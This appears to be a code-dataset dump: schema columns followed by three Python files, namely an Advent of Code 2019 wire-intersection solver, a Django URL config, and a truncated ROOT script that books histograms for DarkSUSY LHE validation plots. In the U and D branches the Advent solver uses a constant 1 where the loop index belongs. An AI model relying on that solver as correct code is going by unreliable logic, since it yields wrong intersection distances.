blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2ed205c312b02dc19f7009c9b2b26de639d25969
|
dede18db20fd47c3059bcbf74562e8773096821e
|
/advent/2019/3/advent1.py
|
9e9514de476c5fa21130d1855c5b72d8f43406eb
|
[] |
no_license
|
conradoboeira/CP
|
a70232d916c04d81c93f84de70afb2f252cff4ad
|
675b098a1c62c7d9bcfa5d8d9a2d7e359b24eef2
|
refs/heads/master
| 2020-03-31T19:55:21.417786
| 2020-02-18T03:56:40
| 2020-02-18T03:56:40
| 152,518,258
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,794
|
py
|
line1 = input().split(',')
line2 = input().split(',')
pts_marked = []
pt= (0,0)
for com in line1:
direction = com[0]
dist = int(com[1:])
if(direction == 'R'):
end_point = (pt[0]+ dist, pt[1])
if(direction == 'L'):
end_point = (pt[0]- dist, pt[1])
if(direction == 'U'):
end_point = (pt[0], pt[1] + dist)
if(direction == 'D'):
end_point = (pt[0], pt[1]- dist)
if(direction == 'R'):
for i in range (pt[0], end_point[0]+1):
pts_marked.append((i, pt[1]))
elif(direction == 'L'):
for i in range (pt[0], end_point[0]-1, -1):
pts_marked.append((i, pt[1]))
elif(direction == 'U'):
for i in range (pt[1], end_point[1]+1):
pts_marked.append((pt[0], i))
else:
for i in range (pt[1], end_point[1]-1, -1):
pts_marked.append((pt[0], i))
pt = end_point
print(pts_marked)
closer_pt = -1
pt = (0,0)
for com in line2:
direction = com[0]
dist = int(com[1:])
if(direction == 'R'):
end_point = (pt[0]+ dist, pt[1])
if(direction == 'L'):
end_point = (pt[0]- dist, pt[1])
if(direction == 'U'):
end_point = (pt[0], pt[1] + dist)
if(direction == 'D'):
end_point = (pt[0], pt[1]- dist)
if(direction == 'R'):
for i in range (pt[0], end_point[0]+1):
point = (i, pt[1])
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
elif(direction == 'L'):
for i in range (pt[0], end_point[0]-1, -1):
point = (i, pt[1])
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
elif(direction == 'U'):
for i in range (pt[1], end_point[1]+1):
point = (pt[0], 1)
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
else:
for i in range (pt[1], end_point[1]-1, -1):
point = (pt[0], 1)
if point in pts_marked:
#print(point)
dist = abs(point[0]) + abs(point[1])
if(closer_pt == -1 or dist < closer_pt):
if(pt == (0,0)): continue
closer_pt = dist
print(end_point)
pt = end_point
print(closer_pt)
|
[
"conrado.boeira@acad.pucrs.br"
] |
conrado.boeira@acad.pucrs.br
|
e0c7dd836f868d77b664a7a7d8b6cb4c6b8ce3e2
|
2d33afa6c666d839828473c65c9800df7ff40bec
|
/resume/urls.py
|
2544270ce66dba35c78124edce5ccb3c212356b5
|
[] |
no_license
|
raphaelmulenda/cv_template
|
5ee1d10a462b3694556bd3ecb07591557df7151a
|
b9fc98d246f1efb50fd2cc404d3511b7214109b2
|
refs/heads/main
| 2023-08-25T02:39:43.169105
| 2021-10-19T12:15:28
| 2021-10-19T12:15:28
| 418,229,601
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 127
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path("", views.HomePage.as_view(), name="home-page")
]
|
[
"mulendaraphael@yahoo.fr"
] |
mulendaraphael@yahoo.fr
|
59411623046d6332476124e04690091dcaed47f4
|
25864296fe1d059bba11e999541828ea5eadc5b9
|
/DarkSUSY_mH_125/mGammaD_0275/cT_10000/DarkSUSY_LHE_read.py
|
67e6e5eb47bd296666d7acc0323970e5aa374aa6
|
[] |
no_license
|
bmichlin/MuJetAnalysis_DarkSusySamples_LHE_13TeV_01
|
17965f8eddf65d24a7c3c8ab81f92c3fc21f4f58
|
1de8d11f1a2e86874cd92b9819adbad4a6780b81
|
refs/heads/master
| 2020-06-14T12:54:38.920627
| 2015-03-18T14:00:07
| 2015-03-18T14:00:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 111,093
|
py
|
import ROOT, array, os, re, math, random, string
from math import *
from operator import itemgetter
def getStringBetween(name, first, second):
begOf1 = name.find(first)
endOf1 = len(first) + begOf1
begOf2 = name.find(second)
desiredString = name[endOf1:begOf2]
return desiredString
muonID = 13
higgsID = 25
n1ID = 3000002
nDID = 3000001
nExit = 80002
#nExit = 1000
gammaDID = 3000022
hMass = "125"
n1Mass = "10"
nDMass = "1"
filename = "DarkSUSY_mH_125_mGammaD_0275_13TeV_cT_10000_madgraph452_bridge224_events80k.lhe"
filename = "DarkSUSY_mH_125_mGammaD_0275_13TeV_cT_10000_madgraph452_bridge224_events80k.lhe"
f = open(filename, 'r')
if len(filename) >= 77:
mass_GammaD = getStringBetween(filename, "mGammaD_","_13TeV_cT")
lifetime_GammaD = getStringBetween(filename, "_cT_","_madgraph452")
energy = getStringBetween(filename, mass_GammaD + "_","TeV_")
mass_Higgs = getStringBetween(filename, "_mH_","_mGammaD_")
lifetime_GammaD_Legend = lifetime_GammaD[0:-2] + "." + lifetime_GammaD[len(lifetime_GammaD)-2:len(lifetime_GammaD)]
mass_GammaD_Legend = mass_GammaD[0:-3] + "." + mass_GammaD[len(mass_GammaD)-3:len(lifetime_GammaD)+1]
#mass_GammaD = filename[24:-49]
#lifetime_GammaD = filename[38:-36]
#energy = filename[29:-46]
#mass_Higgs = filename[12:-62]
#lifetime_GammaD_Legend = filename[38:-38] + "." + filename[39:-36]
#mass_GammaD_Legend = filename [24:-52] + "." + filename[25:-49]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "0": mass_GammaD_Legend = mass_GammaD_Legend[:-1]
if mass_GammaD_Legend[len(mass_GammaD_Legend)-1] == "." and len(mass_GammaD_Legend) <= 3: mass_GammaD_Legend = mass_GammaD_Legend + "0"
switch = 0
if lifetime_GammaD_Legend[len(lifetime_GammaD_Legend)-1] == "0":
lifetime_GammaD_Legend = lifetime_GammaD_Legend[:-1]
switch = 1
if lifetime_GammaD_Legend[len(lifetime_GammaD_Legend)-1] == "0" and switch == 1: lifetime_GammaD_Legend = lifetime_GammaD_Legend[:-1]
else:
lifetime_GammaD = "000"
lifetime_GammaD_Legend = "0.00"
mass_GammaD = getStringBetween(filename, "mGammaD_","_13TeV")
energy = getStringBetween(filename, mass_GammaD + "_","TeV")
mass_Higgs = getStringBetween(filename, "_mH_","_mGammaD_")
mass_GammaD_Legend = mass_GammaD[0:-3] + "." + mass_GammaD[len(mass_GammaD)-3:len(lifetime_GammaD)+1]
#mass_GammaD = filename[24:-42]
#energy = filename[29:-39]
#mass_Higgs = filename[12:-55]
#mass_GammaD_Legend = filename[24:-45] + "." + filename[25:-42]
#lifetime_GammaD = "000"
#lifetime_GammaD_Legend = "0.00"
print mass_GammaD
print lifetime_GammaD
print lifetime_GammaD_Legend
print mass_GammaD_Legend
BAM = ROOT.TFile("ValidationPlots_mGammaD_" + mass_GammaD + "_" + energy + "_TeV_cT_" + lifetime_GammaD + ".root" , "RECREATE")
execfile("tdrStyle.py")
cnv = ROOT.TCanvas("cnv", "cnv")
txtHeader = ROOT.TLegend(.17,.935,0.97,1.)
txtHeader.SetFillColor(ROOT.kWhite)
txtHeader.SetFillStyle(0)
txtHeader.SetBorderSize(0)
txtHeader.SetTextFont(42)
txtHeader.SetTextSize(0.045)
txtHeader.SetTextAlign(22)
#txtHeader.SetHeader("CMS Simulation")
txtHeader.SetHeader("CMS Simulation (LHE) " + energy + " TeV")
#txtHeader.SetHeader("CMS Prelim. 2011 #sqrt{s} = 7 TeV L_{int} = 5.3 fb^{-1}")
#txtHeader.SetHeader("CMS 2011 #sqrt{s} = 7 TeV L_{int} = 5.3 fb^{-1}")
#txtHeader.SetHeader("CMS Prelim. 2012 #sqrt{s} = 8 TeV L_{int} = 20.65 fb^{-1}")
#txtHeader.SetHeader("CMS 2012 #sqrt{s} = 8 TeV L_{int} = 20.65 fb^{-1}")
txtHeader.Draw()
#info = ROOT.TLegend(0.33,0.8222222,0.9577778,0.9122222)
info = ROOT.TLegend(0.4566667,0.82,0.7822222,0.9066667)
info.SetFillColor(ROOT.kWhite)
info.SetFillStyle(0)
info.SetBorderSize(0)
info.SetTextFont(42)
info.SetTextSize(0.02777778)
info.SetMargin(0.13)
info.SetHeader("#splitline{pp #rightarrow h #rightarrow 2n_{1} #rightarrow 2n_{D} + 2 #gamma_{D} #rightarrow 2n_{D} + 4#mu}{#splitline{m_{h} = " + mass_Higgs + " GeV, m_{n_{1}} = 10 GeV, m_{n_{D}} = 1 GeV}{m_{#gamma_{D}} = " + mass_GammaD_Legend + " GeV, c#tau_{#gamma_{D}} = " + lifetime_GammaD_Legend + " mm}}" )
#info.SetHeader("#splitline{pp #rightarrow h #rightarrow 2n_{1} #rightarrow 2n_{D} + 2 #gamma_{D} #rightarrow 2n_{D} + 4#mu}{#splitline{#gamma_{D} c#tau = "+lifetime_GammaD_Legend + "mm, Mass = " + mass_GammaD_Legend + "GeV}{M of h = " + hMass + "GeV, M of n_{1} = " + n1Mass + "GeV, M of n_{D} = " + nDMass + "GeV}}" )
txtHeader2 = ROOT.TLegend(0.01333333,0.9311111,0.8133333,0.9955556)
txtHeader2.SetFillColor(ROOT.kWhite)
txtHeader2.SetFillStyle(0)
txtHeader2.SetBorderSize(0)
txtHeader2.SetTextFont(42)
txtHeader2.SetTextSize(0.045)
txtHeader2.SetTextAlign(22)
txtHeader2.SetHeader("CMS Simulation #sqrt{s} = " + energy + " TeV")
################################################################################
# pT of muons
################################################################################
Etmiss_dummy = ROOT.TH1F("Etmiss_dummy","Etmiss_dummy", 100, 0, 100)
Etmiss_dummy.SetTitleOffset(1.5, "Y")
Etmiss_dummy.SetTitleOffset(1.4, "X")
Etmiss_dummy.SetTitleSize(0.04,"X")
Etmiss_dummy.SetXTitle("MET = #sum_{n_{D}}#vec{p_{T}} [GeV]")
Etmiss_dummy.SetYTitle("Fraction of events / 1 GeV")
Etmiss_dummy.SetMaximum( 0.1 )
Etmiss = ROOT.TH1F("Etmiss","Etmiss", 100, 0, 100)
Etmiss.SetLineColor(ROOT.kBlue)
Etmiss.SetLineWidth(2)
Etmiss.SetLineStyle(1)
nBins = 125
binMin = 0.0
binMax = 125.0
yMax = 0.25
cTlow = 0
if float(lifetime_GammaD_Legend) != 0:
cTlim = float(lifetime_GammaD_Legend)*5
binwidth = float(lifetime_GammaD_Legend)
numBins = int(cTlim/binwidth)
binwidthRound = round(binwidth,3)
else:
cTlim = 10
binwidth = 1
numBins = int(cTlim/binwidth)
binwidthRound = "1"
formula = "exp(-x/"+ lifetime_GammaD_Legend +")/("+ lifetime_GammaD_Legend + "*(1 - exp(-" + str(cTlim) + "/" + lifetime_GammaD_Legend + ")))"
print formula
h_gammaD_cT_dummy = ROOT.TH1F("h_gammaD_cT_dummy", "h_gammaD_cT_dummy", numBins, 0, cTlim)
#h_gammaD_cT_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_dummy.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_cT_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_dummy.SetMaximum( 10 )
h_gammaD_cT = ROOT.TH1F("h_gammaD_cT", "h_gammaD_cT", numBins, 0, cTlim)
h_gammaD_cT.SetLineColor(ROOT.kBlue)
h_gammaD_cT.SetLineWidth(2)
h_gammaD_cT.SetLineStyle(1)
h_gammaD_cT_lab_dummy = ROOT.TH1F("h_gammaD_cT_lab_dummy", "h_gammaD_cT_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_lab_dummy.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_cT_lab_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_lab = ROOT.TH1F("h_gammaD_cT_lab", "h_gammaD_cT_lab", numBins, 0, cTlim)
h_gammaD_cT_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_lab.SetLineWidth(2)
h_gammaD_cT_lab.SetLineStyle(1)
h_gammaD_cT_XY_lab_dummy = ROOT.TH1F("h_gammaD_cT_XY_lab_dummy", "h_gammaD_cT_XY_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_XY_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_XY_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_XY_lab_dummy.SetXTitle("L_{XY} of #gamma_{D} [mm]")
h_gammaD_cT_XY_lab_dummy.SetYTitle("Normalized Fraction of Events / " + str(binwidthRound) + " mm")
h_gammaD_cT_XY_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_XY_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_XY_lab = ROOT.TH1F("h_gammaD_cT_XY_lab", "h_gammaD_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_cT_XY_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_XY_lab.SetLineWidth(2)
h_gammaD_cT_XY_lab.SetLineStyle(1)
h_gammaD_cT_Z_lab_dummy = ROOT.TH1F("h_gammaD_cT_Z_lab_dummy", "h_gammaD_cT_Z_lab_dummy", numBins, 0, cTlim)
#h_gammaD_cT_Z_lab_dummy.SetYTitle("Fraction of events")
h_gammaD_cT_Z_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_cT_Z_lab_dummy.SetXTitle("L_{Z} of #gamma_{D} [mm]")
h_gammaD_cT_Z_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_cT_Z_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_cT_Z_lab_dummy.SetMaximum( 10 )
h_gammaD_cT_Z_lab = ROOT.TH1F("h_gammaD_cT_Z_lab", "h_gammaD_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_cT_Z_lab.SetLineColor(ROOT.kBlue)
h_gammaD_cT_Z_lab.SetLineWidth(2)
h_gammaD_cT_Z_lab.SetLineStyle(1)
h_gammaD_1_cT_dummy = ROOT.TH1F("h_gammaD_1_cT_dummy", "h_gammaD_1_cT_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_dummy.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_1_cT_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_dummy.SetMaximum( 10 )
h_gammaD_1_cT = ROOT.TH1F("h_gammaD_1_cT", "h_gammaD_1_cT", numBins, 0, cTlim)
h_gammaD_1_cT.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT.SetLineWidth(2)
h_gammaD_1_cT.SetLineStyle(1)
h_gammaD_1_cT_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_lab_dummy", "h_gammaD_1_cT_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_lab_dummy.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_1_cT_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_lab = ROOT.TH1F("h_gammaD_1_cT_lab", "h_gammaD_1_cT_lab", numBins, 0, cTlim)
h_gammaD_1_cT_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_lab.SetLineWidth(2)
h_gammaD_1_cT_lab.SetLineStyle(1)
h_gammaD_1_cT_XY_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_XY_lab_dummy", "h_gammaD_1_cT_XY_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_XY_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_XY_lab_dummy.SetXTitle("L_{XY} of #gamma_{D} [mm]")
h_gammaD_1_cT_XY_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_XY_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_XY_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_XY_lab = ROOT.TH1F("h_gammaD_1_cT_XY_lab", "h_gammaD_1_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_1_cT_XY_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_XY_lab.SetLineWidth(2)
h_gammaD_1_cT_XY_lab.SetLineStyle(1)
h_gammaD_1_cT_Z_lab_dummy = ROOT.TH1F("h_gammaD_1_cT_Z_lab_dummy", "h_gammaD_1_cT_Z_lab_dummy", numBins, 0, cTlim)
h_gammaD_1_cT_Z_lab_dummy.SetTitleOffset(1.3, "Y")
h_gammaD_1_cT_Z_lab_dummy.SetXTitle("L_{Z} of #gamma_{D} [mm]")
h_gammaD_1_cT_Z_lab_dummy.SetYTitle("Normalized Fraction of events / " + str(binwidthRound) + " mm")
h_gammaD_1_cT_Z_lab_dummy.SetTitleSize(0.05,"Y")
h_gammaD_1_cT_Z_lab_dummy.SetMaximum( 10 )
h_gammaD_1_cT_Z_lab = ROOT.TH1F("h_gammaD_1_cT_Z_lab", "h_gammaD_1_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_1_cT_Z_lab.SetLineColor(ROOT.kBlue)
h_gammaD_1_cT_Z_lab.SetLineWidth(2)
h_gammaD_1_cT_Z_lab.SetLineStyle(1)
h_gammaD_2_cT = ROOT.TH1F("h_gammaD_2_cT", "h_gammaD_2_cT", numBins, 0, cTlim)
h_gammaD_2_cT.SetLineColor(ROOT.kRed)
h_gammaD_2_cT.SetLineWidth(2)
h_gammaD_2_cT.SetLineStyle(1)
h_gammaD_2_cT_lab = ROOT.TH1F("h_gammaD_2_cT_lab", "h_gammaD_2_cT_lab", numBins, 0, cTlim)
h_gammaD_2_cT_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_lab.SetLineWidth(2)
h_gammaD_2_cT_lab.SetLineStyle(1)
h_gammaD_2_cT_XY_lab = ROOT.TH1F("h_gammaD_2_cT_XY_lab", "h_gammaD_2_cT_XY_lab", numBins, 0, cTlim)
h_gammaD_2_cT_XY_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_XY_lab.SetLineWidth(2)
h_gammaD_2_cT_XY_lab.SetLineStyle(1)
h_gammaD_2_cT_Z_lab = ROOT.TH1F("h_gammaD_2_cT_Z_lab", "h_gammaD_2_cT_Z_lab", numBins, 0, cTlim)
h_gammaD_2_cT_Z_lab.SetLineColor(ROOT.kRed)
h_gammaD_2_cT_Z_lab.SetLineWidth(2)
h_gammaD_2_cT_Z_lab.SetLineStyle(1)
h_muon_pT_dummy = ROOT.TH1F("h_muon_pT_dummy", "h_muon_pT_dummy", nBins, binMin, binMax)
h_muon_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_pT_dummy.SetTitleOffset(1.35, "Y")
h_muon_pT_dummy.SetXTitle("p_{T} of #mu [GeV]")
h_muon_pT_dummy.SetMaximum( 0.2 )
h_higgs_pT_dummy = ROOT.TH1F("h_higgs_pT_dummy", "h_higgs_pT_dummy", 10, 0, 10)
h_higgs_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_pT_dummy.SetTitleOffset(1.35, "Y")
h_higgs_pT_dummy.SetXTitle("p_{T} of h [GeV]")
h_higgs_pT_dummy.SetMaximum( 1.1 )
h_muon_pZ_dummy = ROOT.TH1F("h_muon_pZ_dummy", "h_muon_pZ_dummy", nBins, binMin, binMax)
h_muon_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_pZ_dummy.SetTitleOffset(1.35, "Y")
h_muon_pZ_dummy.SetXTitle("|p_{Z}| of #mu [GeV]")
h_muon_pZ_dummy.SetMaximum( yMax )
h_higgs_pZ_dummy = ROOT.TH1F("h_higgs_pZ_dummy", "h_higgs_pZ_dummy", 50, 0, 500)
h_higgs_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_pZ_dummy.SetTitleOffset(1.35, "Y")
h_higgs_pZ_dummy.SetXTitle("|p_{Z}| of h [GeV]")
h_higgs_pZ_dummy.SetMaximum( 0.1 )
h_muon_Eta_dummy = ROOT.TH1F("h_muon_Eta_dummy", "h_muon_Eta_dummy", 100, -5, 5)
h_muon_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_muon_Eta_dummy.SetTitleOffset(1.35, "Y")
h_muon_Eta_dummy.SetXTitle("#eta of #mu")
h_muon_Eta_dummy.SetMaximum( 0.1 )
#h_higgs_Eta_dummy = ROOT.TH1F("h_higgs_Eta_dummy", "h_higgs_Eta_dummy", 100,-5,5)
#h_higgs_Eta_dummy.SetYTitle("Fraction of events / 0.1 GeV")
#h_higgs_Eta_dummy.SetTitleOffset(1.35, "Y")
#h_higgs_Eta_dummy.SetXTitle("#eta of h [GeV]")
#h_higgs_Eta_dummy.SetMaximum( 0.1 )
h_muon_Phi_dummy = ROOT.TH1F("h_muon_Phi_dummy", "h_muon_Phi_dummy", 80,-4,4)
h_muon_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_muon_Phi_dummy.SetTitleOffset(1.35, "Y")
h_muon_Phi_dummy.SetXTitle("#phi of #mu [rad]")
h_muon_Phi_dummy.SetMaximum( 0.1 )
h_higgs_Phi_dummy = ROOT.TH1F("h_higgs_Phi_dummy", "h_higgs_Phi_dummy", 80,-4,4)
h_higgs_Phi_dummy.SetYTitle("Fraction of events")
h_higgs_Phi_dummy.SetTitleOffset(1.35, "Y")
h_higgs_Phi_dummy.SetXTitle("#phi of h [rad]")
h_higgs_Phi_dummy.SetMaximum( 1.4 )
h_higgs_p_dummy = ROOT.TH1F("h_higgs_p_dummy", "h_higgs_p_dummy", 50, 0, 500)
h_higgs_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_p_dummy.SetTitleOffset(1.35, "Y")
h_higgs_p_dummy.SetXTitle("p of h [GeV]")
h_higgs_p_dummy.SetMaximum( 0.1 )
h_higgs_M_dummy = ROOT.TH1F("h_higgs_M_dummy", "h_higgs_M_dummy", 220, 80.5, 300.5)
h_higgs_M_dummy.SetYTitle("Fraction of events / 1 GeV")
h_higgs_M_dummy.SetTitleOffset(1.35, "Y")
h_higgs_M_dummy.SetXTitle("Mass of h [GeV]")
h_higgs_M_dummy.SetLabelSize(0.03,"X")
h_higgs_M_dummy.SetMaximum( 1.5 )
h_higgs_M_dummy.SetNdivisions(10)
h_higgs_M_dummy.GetXaxis().SetMoreLogLabels()
h_higgs_p = ROOT.TH1F("h_higgs_p", "h_higgs_p", 50, 0, 500)
h_higgs_p.SetLineColor(ROOT.kBlue)
h_higgs_p.SetLineWidth(2)
h_higgs_p.SetLineStyle(1)
h_higgs_M = ROOT.TH1F("h_higgs_M", "h_higgs_M", 10, 120.5, 130.5)
h_higgs_M.SetLineColor(ROOT.kBlue)
h_higgs_M.SetLineWidth(2)
h_higgs_M.SetLineStyle(1)
h_higgs_pT = ROOT.TH1F("h_higgs_pT", "h_higgs_pT", 10, 0, 10)
h_higgs_pT.SetLineColor(ROOT.kBlue)
h_higgs_pT.SetLineWidth(2)
h_higgs_pT.SetLineStyle(1)
h_n1_1_pT_dummy = ROOT.TH1F("h_n1_1_pT_dummy", "h_n1_1_pT_dummy", 70, 0, 70)
h_n1_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_pT_dummy.SetXTitle("p_{T} of n_{1} [GeV]")
h_n1_1_pT_dummy.SetMaximum( yMax )
h_higgs_pZ = ROOT.TH1F("h_higgs_pZ", "h_higgs_pZ", 50, 0, 500)
h_higgs_pZ.SetLineColor(ROOT.kBlue)
h_higgs_pZ.SetLineWidth(2)
h_higgs_pZ.SetLineStyle(1)
h_n1_1_pZ_dummy = ROOT.TH1F("h_n1_1_pZ_dummy", "h_n1_1_pZ_dummy", 300, 0, 300)
h_n1_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_pZ_dummy.SetXTitle("|p_{Z}| of n_{1} [GeV]")
h_n1_1_pZ_dummy.SetMaximum( 0.1 )
#h_higgs_Eta = ROOT.TH1F("h_higgs_Eta", "h_higgs_Eta", 50,0,5)
#h_higgs_Eta.SetLineColor(ROOT.kBlue)
#h_higgs_Eta.SetLineWidth(2)
#h_higgs_Eta.SetLineStyle(1)
h_n1_1_Eta_dummy = ROOT.TH1F("h_n1_1_Eta_dummy", "h_n1_1_Eta_dummy", 100,-5,5)
h_n1_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_n1_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_Eta_dummy.SetXTitle("#eta of n_{1}")
h_n1_1_Eta_dummy.SetMaximum( 0.1 )
h_higgs_Phi = ROOT.TH1F("h_higgs_Phi", "h_higgs_Phi", 80,-4,4)
h_higgs_Phi.SetLineColor(ROOT.kBlue)
h_higgs_Phi.SetLineWidth(2)
h_higgs_Phi.SetLineStyle(1)
h_n1_1_Phi_dummy = ROOT.TH1F("h_n1_1_Phi_dummy", "h_n1_1_Phi_dummy", 80,-4,4)
h_n1_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_n1_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_Phi_dummy.SetXTitle("#phi of n_{1} [rad]")
h_n1_1_Phi_dummy.SetMaximum( 0.05 )
h_n1_1_p_dummy = ROOT.TH1F("h_n1_1_p_dummy", "h_n1_1_p_dummy", 300, 0, 300)
h_n1_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_p_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_p_dummy.SetXTitle("p of n_{1} [GeV]")
h_n1_1_p_dummy.SetMaximum( 0.1 )
h_n1_1_M_dummy = ROOT.TH1F("h_n1_1_M_dummy", "h_n1_1_M_dummy", 200, 0.05, 20.05)
h_n1_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_n1_1_M_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_M_dummy.SetXTitle("Mass of n_{1} [GeV]")
h_n1_1_M_dummy.SetMaximum( 1.6 )
h_n1_1_p = ROOT.TH1F("h_n1_1_p", "h_n1_1_p", 300, 0, 300)
h_n1_1_p.SetLineColor(ROOT.kBlue)
h_n1_1_p.SetLineWidth(2)
h_n1_1_p.SetLineStyle(1)
h_n1_1_M = ROOT.TH1F("h_n1_1_M", "h_n1_1_M", 200, 0.05, 20.05)
h_n1_1_M.SetLineColor(ROOT.kBlue)
h_n1_1_M.SetLineWidth(2)
h_n1_1_M.SetLineStyle(1)
h_n1_1_pT = ROOT.TH1F("h_n1_1_pT", "h_n1_1_pT", 70, 0, 70) #this is the peak at 60
h_n1_1_pT.SetLineColor(ROOT.kBlue)
h_n1_1_pT.SetLineWidth(2)
h_n1_1_pT.SetLineStyle(1)
h_n1_1_pZ = ROOT.TH1F("h_n1_1_pZ", "h_n1_1_pZ", 300, 0, 300)
h_n1_1_pZ.SetLineColor(ROOT.kBlue)
h_n1_1_pZ.SetLineWidth(2)
h_n1_1_pZ.SetLineStyle(1)
h_n1_1_Eta = ROOT.TH1F("h_n1_1_Eta", "h_n1_1_Eta", 100,-5,5)
h_n1_1_Eta.SetLineColor(ROOT.kBlue)
h_n1_1_Eta.SetLineWidth(2)
h_n1_1_Eta.SetLineStyle(1)
h_n1_1_Phi = ROOT.TH1F("h_n1_1_Phi", "h_n1_1_Phi", 80,-4,4)
h_n1_1_Phi.SetLineColor(ROOT.kBlue)
h_n1_1_Phi.SetLineWidth(2)
h_n1_1_Phi.SetLineStyle(1)
